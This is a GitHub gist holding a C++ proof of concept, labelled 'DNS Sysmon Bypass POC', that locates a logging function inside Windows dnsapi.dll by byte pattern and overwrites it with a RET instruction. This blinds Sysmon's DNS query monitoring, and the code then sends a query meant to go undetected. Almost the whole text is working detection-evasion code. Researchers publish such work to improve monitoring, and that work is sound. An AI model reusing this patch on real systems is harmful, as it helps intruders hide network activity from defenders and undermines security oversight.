Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#include <iostream>
#include <Windows.h>
#include <WinDNS.h>
// Pattern for hunting dnsapi!McTemplateU0zqxqz
#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c"
#define PATTERN_LEN 14
// Search for pattern in memory
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {
ULONG offset = 0;
for (int i = 0; i < 0x200000; i++) {
if (*(unsigned char*)(mem + i) == signature[0] && *(unsigned char*)(mem + i + 1) == signature[1]) {
if (memcmp(mem + i, signature, signatureLen) == 0) {
// Found the signature
offset = i;
break;
}
}
}
return offset;
}
int main()
{
DWORD oldProtect, oldOldProtect;
printf("DNS Sysmon Bypass POC\n by @_xpn_\n\n");
unsigned char *dll = (unsigned char *)LoadLibraryA("dnsapi.dll");
if (dll == (void*)0) {
printf("[x] Could not load dnsapi.dll\n");
return 1;
}
DWORD patternOffset = SearchPattern(dll, PATTERN, PATTERN_LEN);
printf("[*] Pattern found at offset %d\n", patternOffset);
printf("[*] Patching with RET\n");
VirtualProtect(dll + patternOffset, 10, PAGE_EXECUTE_READWRITE, &oldProtect);
*(dll + patternOffset) = 0xc3;
VirtualProtect(dll, 10, oldProtect, &oldOldProtect);
printf("[*] Sending DNS Query... should now not be detected\n");
DnsQuery_A("blog.xpnsec.com", DNS_TYPE_A, DNS_QUERY_STANDARD, NULL, NULL, NULL);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.